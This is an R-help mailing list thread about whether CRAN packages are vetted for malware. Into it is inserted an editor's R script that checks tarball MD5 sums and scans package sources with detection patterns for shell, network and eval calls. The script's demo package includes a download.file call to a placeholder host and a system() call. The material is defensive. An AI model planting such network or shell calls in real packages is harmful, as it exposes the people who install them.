I just thought maybe there is something - about the process of submitting packages or anything like that - that shows that at least some diligence is being done to ensure that a given package is not just a piece of malware from ISIS or Russia. But if you, Bert, say it's not the case, then I'll believe you.

I've asked my question after I received the following email from a partner company (that is a SaaS company): They are starting to work with R and we are delivering some R code to them that will run in the background. I mentioned that certain R packages have to be installed in order for the code to run and got this:

"I'm also going to assume that our team will want to vet any package you request. We're big fans of open source and leveraging 3rd party libraries but are keenly aware of the risks in 'inviting strangers into your house'."

This is why I asked. So, I guess, my response should be - yes, please, go ahead and "vet" them any way you want.

Thank you!

On Thu, Dec 8, 2016 at 12:55 PM, Bert Gunter <bgunter.4567 at gmail.com> wrote:
> 1. What does "Safe" mean???
>
> 2. From the R banner on startup:
>
> "R is free software and comes with ABSOLUTELY NO WARRANTY."
>
> Don't think it could be clearer than that!
>
> Cheers,
> Bert
>
> Bert Gunter
>
> "The trouble with having an open mind is that people keep coming along
> and sticking things into it."
> -- Opus (aka Berkeley Breathed in his "Bloom County" comic strip )
>
> On Thu, Dec 8, 2016 at 9:47 AM, Dimitri Liakhovitski
> <dimitri.liakhovitski at gmail.com> wrote:
>> Guys,
>>
>> suddenly, I am being asked for a proof that R packages that are not
>> "base" are safe. I've never been asked this question before.
>>
>> Is there some documentation on CRAN that discusses how it's ensured
>> that all "official" R packages have been "vetted" and are safe?
>>
>> Thanks a lot!
>>
>> --
>> Dimitri Liakhovitski
>>
>> ______________________________________________
>> R-help at r-project.org mailing list -- To UNSUBSCRIBE and more, see
>> https://stat.ethz.ch/mailman/listinfo/r-help
>> PLEASE do read the posting guide http://www.R-project.org/posting-guide.html
>> and provide commented, minimal, self-contained, reproducible code.

--
Dimitri Liakhovitski
Dimitri:

On Thu, Dec 8, 2016 at 10:05 AM, Dimitri Liakhovitski <dimitri.liakhovitski at gmail.com> wrote:
> I just thought maybe there is something - about the process of
> submitting packages or anything like that - that shows that at least
> some diligence is being done to ensure that a given package is not
> just a piece of malware from ISIS or Russia.
> But if you, Bert, say it's not the case, then I'll believe you.

*** I DID NOT SAY THAT ***

You asked for **guarantees**. R has none. But of course U. Wien checks R packages on submission for malicious code (it is one reason binary submissions are generally not permitted) and R repository servers of course have filters in place. BUT THERE ARE NO GUARANTEES, explicit or implied.

Cheers,
Bert

> I've asked my question after I received the following email from a
> partner company (that is a SaaS company):
> They are starting to work with R and we are delivering some R code to
> them that will run in the background. I mentioned that certain R
> packages have to be installed in order for the code to run and got
> this:
>
> "I'm also going to assume that our team will want to vet any package
> you request. We're big fans of open source and leveraging 3rd party
> libraries but are keenly aware of the risks in 'inviting strangers
> into your house'."
>
> This is why I asked.
> So, I guess, my response should be - yes, please, go ahead and "vet"
> them any way you want.
> Thank you!
>
> On Thu, Dec 8, 2016 at 12:55 PM, Bert Gunter <bgunter.4567 at gmail.com> wrote:
>> 1. What does "Safe" mean???
>>
>> 2. From the R banner on startup:
>>
>> "R is free software and comes with ABSOLUTELY NO WARRANTY."
>>
>> Don't think it could be clearer than that!
>>
>> Cheers,
>> Bert
>>
>> Bert Gunter
>>
>> "The trouble with having an open mind is that people keep coming along
>> and sticking things into it."
>> -- Opus (aka Berkeley Breathed in his "Bloom County" comic strip )
>>
>> On Thu, Dec 8, 2016 at 9:47 AM, Dimitri Liakhovitski
>> <dimitri.liakhovitski at gmail.com> wrote:
>>> Guys,
>>>
>>> suddenly, I am being asked for a proof that R packages that are not
>>> "base" are safe. I've never been asked this question before.
>>>
>>> Is there some documentation on CRAN that discusses how it's ensured
>>> that all "official" R packages have been "vetted" and are safe?
>>>
>>> Thanks a lot!
>>>
>>> --
>>> Dimitri Liakhovitski
>
> --
> Dimitri Liakhovitski
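Since, as the reply above says, there are no guarantees, a receiving team that wants to "vet" a package has to do its own checking. The script below is an added example written for this page; it is not code from any participant in the thread, from CRAN or from the R project. It does two independent things on a source package: compares a downloaded tarball's MD5 against the MD5sum column that `available.packages()` reads from the repository's PACKAGES index, and greps the package's R sources for calls that reach outside the R session (shell, network, code evaluation, native code, environment access). The package `fakepkg` and its contents are constructed here for the demonstration, and the pattern list is an editor's heuristic, not a CRAN check.

```r
## Added example: a minimal vetting pass for an R source package.
##   1. verify_cran_md5(): does the tarball's MD5 match the one the
##      repository publishes?  This catches a corrupted or tampered
##      mirror/transit copy.  The checksum comes from the same server as
##      the tarball, so it says nothing about whether the package was
##      malicious when it was accepted.
##   2. scan_r_sources(): heuristic grep of R/ for calls that leave the
##      R session.  Hits are leads for a human reviewer, not proof of
##      malice (e.g. .Call is normal in any package with compiled code).

## A token boundary that also works before names starting with a dot.
word_start <- "(^|[^A-Za-z0-9_.])"

## Editor-chosen heuristic patterns (assumption: this list is illustrative,
## not exhaustive).
risky_patterns <- c(
  shell       = paste0(word_start, "(system|system2|shell|pipe)\\s*\\("),
  network     = paste0(word_start,
                       "(download\\.file|url|socketConnection)\\s*\\(|(curl|httr)::"),
  codegen     = paste0(word_start, "eval\\s*\\(\\s*parse\\s*\\("),
  native      = paste0(word_start, "(dyn\\.load|\\.Call|\\.C|\\.External)\\s*\\("),
  environment = paste0(word_start, "(Sys\\.setenv|Sys\\.getenv|\\.Internal)\\s*\\(")
)

## Scan every *.R / *.r file under <pkg_dir>/R (an unpacked source package).
## Returns a data.frame with one row per (file, line, category) hit.
scan_r_sources <- function(pkg_dir, patterns = risky_patterns) {
  files <- list.files(file.path(pkg_dir, "R"), pattern = "\\.[Rr]$",
                      full.names = TRUE, recursive = TRUE)
  hits <- list()
  for (f in files) {
    lines <- readLines(f, warn = FALSE)
    for (category in names(patterns)) {
      idx <- grep(patterns[[category]], lines, perl = TRUE)
      if (length(idx)) {
        hits[[length(hits) + 1]] <- data.frame(
          file = basename(f), line = idx, category = category,
          code = trimws(lines[idx]), stringsAsFactors = FALSE)
      }
    }
  }
  if (length(hits)) do.call(rbind, hits)
  else data.frame(file = character(), line = integer(),
                  category = character(), code = character())
}

## Compare a downloaded source tarball against the MD5 the repository
## publishes for that package.  Needs network access to read the index.
verify_cran_md5 <- function(tarball, pkg,
                            repos = "https://cloud.r-project.org") {
  idx <- available.packages(repos = repos, type = "source")
  if (!pkg %in% rownames(idx)) stop("package not in repository index: ", pkg)
  expected <- idx[pkg, "MD5sum"]
  actual   <- unname(tools::md5sum(tarball))
  list(ok = identical(tolower(expected), tolower(actual)),
       expected = expected, actual = actual)
}

## ---- Offline demonstration with a constructed (fake) package ----------
## "fakepkg" exists only for this example; nothing below touches CRAN.
demo_pkg <- file.path(tempdir(), "fakepkg")
dir.create(file.path(demo_pkg, "R"), recursive = TRUE, showWarnings = FALSE)
writeLines(c("Package: fakepkg", "Version: 0.0.1"),
           file.path(demo_pkg, "DESCRIPTION"))
writeLines(c(
  "fit_model <- function(x, y) lm(y ~ x)",                    # benign
  "phone_home <- function() {",
  "  download.file('http://example.invalid/p', tempfile())",   # network
  "  system('uname -a')",                                     # shell
  "}",
  "hidden <- function(s) eval(parse(text = s))"               # code eval
), file.path(demo_pkg, "R", "model.R"))

report <- scan_r_sources(demo_pkg)
print(report)

## Live use against a real repository (needs network; not run here):
## tb <- download.packages("jsonlite", destdir = tempdir(), type = "source")[1, 2]
## verify_cran_md5(tb, "jsonlite")
## untar(tb, exdir = tempdir())
## scan_r_sources(file.path(tempdir(), "jsonlite"))
```

Run as written, the scan flags the three constructed lines that call out to the network, the shell and `eval(parse())`, and leaves the benign model-fitting line alone. The checksum step only tells you that you got the bytes the repository intended to serve; reading what the flagged lines actually do, and who maintains the package, is still a human job.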
Great to know, thanks, Bert!

Do you happen to have a reference that shows that:
- U. Wien checks R packages on submission for malicious code
- R repository servers have filters in place.

Thanks again!

On Thu, Dec 8, 2016 at 1:13 PM, Bert Gunter <bgunter.4567 at gmail.com> wrote:
> Dimitri:
>
> On Thu, Dec 8, 2016 at 10:05 AM, Dimitri Liakhovitski
> <dimitri.liakhovitski at gmail.com> wrote:
>> I just thought maybe there is something - about the process of
>> submitting packages or anything like that - that shows that at least
>> some diligence is being done to ensure that a given package is not
>> just a piece of malware from ISIS or Russia.
>> But if you, Bert, say it's not the case, then I'll believe you.
>
> *** I DID NOT SAY THAT ***
>
> You asked for **guarantees**. R has none. But of course U. Wien checks
> R packages on submission for malicious code (it is one reason binary
> submissions are generally not permitted) and R repository servers of
> course have filters in place. BUT THERE ARE NO GUARANTEES, explicit or
> implied.
>
> Cheers,
> Bert
>
>> I've asked my question after I received the following email from a
>> partner company (that is a SaaS company):
>> They are starting to work with R and we are delivering some R code to
>> them that will run in the background. I mentioned that certain R
>> packages have to be installed in order for the code to run and got
>> this:
>>
>> "I'm also going to assume that our team will want to vet any package
>> you request. We're big fans of open source and leveraging 3rd party
>> libraries but are keenly aware of the risks in 'inviting strangers
>> into your house'."
>>
>> This is why I asked.
>> So, I guess, my response should be - yes, please, go ahead and "vet"
>> them any way you want.
>> Thank you!
>>
>> On Thu, Dec 8, 2016 at 12:55 PM, Bert Gunter <bgunter.4567 at gmail.com> wrote:
>>> 1. What does "Safe" mean???
>>>
>>> 2. From the R banner on startup:
>>>
>>> "R is free software and comes with ABSOLUTELY NO WARRANTY."
>>>
>>> Don't think it could be clearer than that!
>>>
>>> Cheers,
>>> Bert
>>>
>>> Bert Gunter
>>>
>>> "The trouble with having an open mind is that people keep coming along
>>> and sticking things into it."
>>> -- Opus (aka Berkeley Breathed in his "Bloom County" comic strip )
>>>
>>> On Thu, Dec 8, 2016 at 9:47 AM, Dimitri Liakhovitski
>>> <dimitri.liakhovitski at gmail.com> wrote:
>>>> Guys,
>>>>
>>>> suddenly, I am being asked for a proof that R packages that are not
>>>> "base" are safe. I've never been asked this question before.
>>>>
>>>> Is there some documentation on CRAN that discusses how it's ensured
>>>> that all "official" R packages have been "vetted" and are safe?
>>>>
>>>> Thanks a lot!
>>>>
>>>> --
>>>> Dimitri Liakhovitski
>>
>> --
>> Dimitri Liakhovitski

--
Dimitri Liakhovitski